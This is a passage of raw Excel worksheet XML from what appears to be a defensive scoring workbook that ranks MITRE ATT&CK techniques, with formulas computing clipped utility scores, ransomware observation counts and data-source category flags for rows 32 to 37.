        <f t="array" ref="AM32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD32)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN32" s="37">
        <v>0</v>
      </c>
      <c r="AO32" s="37">
        <v>2</v>
      </c>
      <c r="AP32" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ32" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.97447557142857</v>
      </c>
      <c r="AR32" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS32" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT32" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU3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2.9035464557823123</v>
      </c>
    </row>
    <row r="33" spans="1:47" ht="51">
      <c r="A33" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B33" s="37">
        <f t="shared" si="0"/>
        <v>80.228554714285721</v>
      </c>
      <c r="C33" s="37" t="s">
        <v>175</v>
      </c>
      <c r="D33" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E33" s="37" t="s">
        <v>176</v>
      </c>
      <c r="F33" s="37">
        <v>1</v>
      </c>
      <c r="G33" s="37">
        <v>1</v>
      </c>
      <c r="H33" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I33" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J33" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K33" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L33" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M33" s="37">
        <v>0</v>
      </c>
      <c r="N33" s="56">
        <v>3</v>
      </c>
      <c r="O33" s="56">
        <v>14</v>
      </c>
      <c r="P33" s="56">
        <v>1</v>
      </c>
      <c r="Q33" s="56">
        <v>9</v>
      </c>
      <c r="R33" s="57" t="s">
        <v>177</v>
      </c>
      <c r="S33" s="57">
        <v>24</v>
      </c>
      <c r="T33" s="57" t="s">
        <v>178</v>
      </c>
      <c r="U33" s="57">
        <v>24</v>
      </c>
      <c r="V33" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.58571414285714296</v>
      </c>
      <c r="W33" s="37">
        <v>48</v>
      </c>
      <c r="X33" s="37">
        <v>0.87272700000000003</v>
      </c>
      <c r="Y33" s="37">
        <v>0.87272700000000003</v>
      </c>
      <c r="Z33" s="37">
        <v>27</v>
      </c>
      <c r="AA33" s="37">
        <v>0.27</v>
      </c>
      <c r="AB33" s="37">
        <v>0.27</v>
      </c>
      <c r="AC33" s="37"/>
      <c r="AD33" s="50" t="s">
        <v>179</v>
      </c>
      <c r="AE33" s="37" t="str" cm="1">
        <f t="array" ref="AE33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD33)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF33" s="37">
        <v>29</v>
      </c>
      <c r="AG33" s="37" t="str" cm="1">
        <f t="array" ref="AG33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD33)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH33" s="37">
        <v>29</v>
      </c>
      <c r="AI33" s="37" t="str" cm="1">
        <f t="array" ref="AI33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD33)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ33" s="37">
        <v>29</v>
      </c>
      <c r="AK33" s="37" t="str" cm="1">
        <f t="array" ref="AK33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD33)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL33" s="37">
        <v>29</v>
      </c>
      <c r="AM33" s="37" t="str" cm="1">
        <f t="array" ref="AM33">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD33)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN33" s="37">
        <v>0</v>
      </c>
      <c r="AO33" s="37">
        <v>5</v>
      </c>
      <c r="AP33" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ33" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>26.742851571428574</v>
      </c>
      <c r="AR33" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS33" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT33" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU3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3.3027204251700679</v>
      </c>
    </row>
    <row r="34" spans="1:47" ht="68">
      <c r="A34" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B34" s="37">
        <f t="shared" si="0"/>
        <v>77.209512285714268</v>
      </c>
      <c r="C34" s="37" t="s">
        <v>180</v>
      </c>
      <c r="D34" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E34" s="37" t="s">
        <v>181</v>
      </c>
      <c r="F34" s="37">
        <v>1</v>
      </c>
      <c r="G34" s="37">
        <v>1</v>
      </c>
      <c r="H34" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I34" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J34" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K34" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L34" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M34" s="37">
        <v>0</v>
      </c>
      <c r="N34" s="56">
        <v>5</v>
      </c>
      <c r="O34" s="56">
        <v>33</v>
      </c>
      <c r="P34" s="56">
        <v>6</v>
      </c>
      <c r="Q34" s="56">
        <v>5</v>
      </c>
      <c r="R34" s="57" t="s">
        <v>182</v>
      </c>
      <c r="S34" s="57">
        <v>16</v>
      </c>
      <c r="T34" s="57" t="s">
        <v>183</v>
      </c>
      <c r="U34" s="57">
        <v>16</v>
      </c>
      <c r="V34" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.53809514285714277</v>
      </c>
      <c r="W34" s="37">
        <v>32</v>
      </c>
      <c r="X34" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y34" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z34" s="37">
        <v>49</v>
      </c>
      <c r="AA34" s="37">
        <v>0.49</v>
      </c>
      <c r="AB34" s="37">
        <v>0.49</v>
      </c>
      <c r="AC34" s="37"/>
      <c r="AD34" s="50" t="s">
        <v>184</v>
      </c>
      <c r="AE34" s="37" t="str" cm="1">
        <f t="array" ref="AE34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD34)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF34" s="37">
        <v>30</v>
      </c>
      <c r="AG34" s="37" t="str" cm="1">
        <f t="array" ref="AG34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD34)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH34" s="37">
        <v>30</v>
      </c>
      <c r="AI34" s="37" t="str" cm="1">
        <f t="array" ref="AI34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD34)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ34" s="37">
        <v>30</v>
      </c>
      <c r="AK34" s="37" t="str" cm="1">
        <f t="array" ref="AK34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD34)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL34" s="37">
        <v>30</v>
      </c>
      <c r="AM34" s="37" t="str" cm="1">
        <f t="array" ref="AM34">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD34)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN34" s="37">
        <v>0</v>
      </c>
      <c r="AO34" s="37">
        <v>2</v>
      </c>
      <c r="AP34" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ34" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>25.736504095238089</v>
      </c>
      <c r="AR34" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS34" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT34" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU3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1.2731668616780043</v>
      </c>
    </row>
    <row r="35" spans="1:47" ht="34">
      <c r="A35" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B35" s="37">
        <f t="shared" si="0"/>
        <v>55.952398809523807</v>
      </c>
      <c r="C35" s="37" t="s">
        <v>185</v>
      </c>
      <c r="D35" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E35" s="37" t="s">
        <v>186</v>
      </c>
      <c r="F35" s="37">
        <v>1</v>
      </c>
      <c r="G35" s="37">
        <v>1</v>
      </c>
      <c r="H35" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I35" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J35" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K35" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L35" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M35" s="37">
        <v>0</v>
      </c>
      <c r="N35" s="56">
        <v>1</v>
      </c>
      <c r="O35" s="56">
        <v>9</v>
      </c>
      <c r="P35" s="56">
        <v>0</v>
      </c>
      <c r="Q35" s="56">
        <v>5</v>
      </c>
      <c r="R35" s="57" t="s">
        <v>187</v>
      </c>
      <c r="S35" s="57">
        <v>10</v>
      </c>
      <c r="T35" s="57" t="s">
        <v>188</v>
      </c>
      <c r="U35" s="57">
        <v>19</v>
      </c>
      <c r="V35" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.3476191904761905</v>
      </c>
      <c r="W35" s="37">
        <v>29</v>
      </c>
      <c r="X35" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Y35" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Z35" s="37">
        <v>15</v>
      </c>
      <c r="AA35" s="37">
        <v>0.15</v>
      </c>
      <c r="AB35" s="37">
        <v>0.15</v>
      </c>
      <c r="AC35" s="37"/>
      <c r="AD35" s="50" t="s">
        <v>189</v>
      </c>
      <c r="AE35" s="37" t="str" cm="1">
        <f t="array" ref="AE35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD35)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF35" s="37">
        <v>31</v>
      </c>
      <c r="AG35" s="37" t="str" cm="1">
        <f t="array" ref="AG35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD35)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH35" s="37">
        <v>31</v>
      </c>
      <c r="AI35" s="37" t="str" cm="1">
        <f t="array" ref="AI35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD35)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ35" s="37">
        <v>31</v>
      </c>
      <c r="AK35" s="37" t="str" cm="1">
        <f t="array" ref="AK35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD35)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL35" s="37">
        <v>31</v>
      </c>
      <c r="AM35" s="37" t="str" cm="1">
        <f t="array" ref="AM35">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD35)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN35" s="37">
        <v>0</v>
      </c>
      <c r="AO35" s="37">
        <v>0</v>
      </c>
      <c r="AP35" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ35" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>18.650799603174601</v>
      </c>
      <c r="AR35" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS35" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT35" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU3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6" spans="1:47" ht="51">
      <c r="A36" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B36" s="37">
        <f t="shared" si="0"/>
        <v>52.214316428571429</v>
      </c>
      <c r="C36" s="37" t="s">
        <v>190</v>
      </c>
      <c r="D36" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E36" s="37" t="s">
        <v>191</v>
      </c>
      <c r="F36" s="37">
        <v>1</v>
      </c>
      <c r="G36" s="37">
        <v>1</v>
      </c>
      <c r="H36" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I36" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J36" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K36" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L36" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M36" s="37">
        <v>0</v>
      </c>
      <c r="N36" s="56">
        <v>0</v>
      </c>
      <c r="O36" s="56">
        <v>1</v>
      </c>
      <c r="P36" s="56">
        <v>1</v>
      </c>
      <c r="Q36" s="56">
        <v>2</v>
      </c>
      <c r="R36" s="57" t="s">
        <v>192</v>
      </c>
      <c r="S36" s="57">
        <v>15</v>
      </c>
      <c r="T36" s="57" t="s">
        <v>193</v>
      </c>
      <c r="U36" s="57">
        <v>15</v>
      </c>
      <c r="V36" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30476214285714287</v>
      </c>
      <c r="W36" s="37">
        <v>30</v>
      </c>
      <c r="X36" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Y36" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Z36" s="37">
        <v>4</v>
      </c>
      <c r="AA36" s="37">
        <v>0.04</v>
      </c>
      <c r="AB36" s="37">
        <v>0.04</v>
      </c>
      <c r="AC36" s="37"/>
      <c r="AD36" s="50" t="s">
        <v>194</v>
      </c>
      <c r="AE36" s="37" t="str" cm="1">
        <f t="array" ref="AE36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD36)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF36" s="37">
        <v>32</v>
      </c>
      <c r="AG36" s="37" t="str" cm="1">
        <f t="array" ref="AG36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD36)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH36" s="37">
        <v>32</v>
      </c>
      <c r="AI36" s="37" t="str" cm="1">
        <f t="array" ref="AI36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD36)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ36" s="37">
        <v>32</v>
      </c>
      <c r="AK36" s="37" t="str" cm="1">
        <f t="array" ref="AK36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD36)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL36" s="37">
        <v>32</v>
      </c>
      <c r="AM36" s="37" t="str" cm="1">
        <f t="array" ref="AM36">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD36)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN36" s="37">
        <v>0</v>
      </c>
      <c r="AO36" s="37">
        <v>1</v>
      </c>
      <c r="AP36" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ36" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>17.404772142857144</v>
      </c>
      <c r="AR36" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS36" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT36" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU3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0.4382088605442177</v>
      </c>
    </row>
    <row r="37" spans="1:47" ht="51">
      <c r="A37" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B37" s="37">
        <f t="shared" si="0"/>
        <v>62.066660333333338</v>
      </c>
      <c r="C37" s="37" t="s">
        <v>195</v>
      </c>
      <c r="D37" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E37" s="37" t="s">
        <v>196</v>
      </c>
      <c r="F37" s="37">
        <v>1</v>
      </c>
      <c r="G37" s="37">
        <v>1</v>
      </c>
      <c r="H37" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I37" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J37" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K37" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L37" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M37" s="37">
        <v>0</v>
      </c>
      <c r="N37" s="56">
        <v>0</v>
      </c>
      <c r="O37" s="56">
        <v>1</v>
      </c>
      <c r="P37" s="56">
        <v>0</v>
      </c>
      <c r="Q37" s="56">
        <v>0</v>
      </c>
      <c r="R37" s="57" t="s">
        <v>197</v>
      </c>
      <c r="S37" s="57">
        <v>15</v>
      </c>
      <c r="T37" s="57" t="s">
        <v>198</v>
      </c>
      <c r="U37" s="57">
        <v>23</v>
      </c>
      <c r="V37" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.36666661904761905</v>
      </c>
      <c r="W37" s="37">
        <v>38</v>
      </c>
      <c r="X37" s="37">
        <v>0.690909</v>
      </c>
      <c r="Y37" s="37">
        <v>0.690909</v>
      </c>
      <c r="Z37" s="37">
        <v>1</v>
      </c>
      <c r="AA37" s="37">
        <v>0.01</v>
      </c>
      <c r="AB37" s="37">
        <v>0.01</v>
      </c>
      <c r="AC37" s="37"/>
      <c r="AD37" s="50" t="s">
        <v>194</v>
      </c>
      <c r="AE37" s="37" t="str" cm="1">
        <f t="array" ref="AE37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD37)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF37" s="37">
        <v>33</v>
      </c>
      <c r="AG37" s="37" t="str" cm="1">
        <f t="array" ref="AG37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD37)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH37" s="37">
        <v>33</v>
      </c>
      <c r="AI37" s="37" t="str" cm="1">
        <f t="array" ref="AI37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD37)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ37" s="37">
        <v>33</v>
      </c>
      <c r="AK37" s="37" t="str" cm="1">
        <f t="array" ref="AK37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD37)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL37" s="37">
        <v>33</v>
      </c>
      <c r="AM37" s="37" t="str" cm="1">
        <f t="array" ref="AM37">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD37)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN37" s="37">
        <v>0</v>
      </c>
      <c r="AO37" s="37">
        <v>1</v>
      </c>
      <c r="AP37" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ37" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>20.688886777777778</v>
      </c>
      <c r="AR37" s="37">
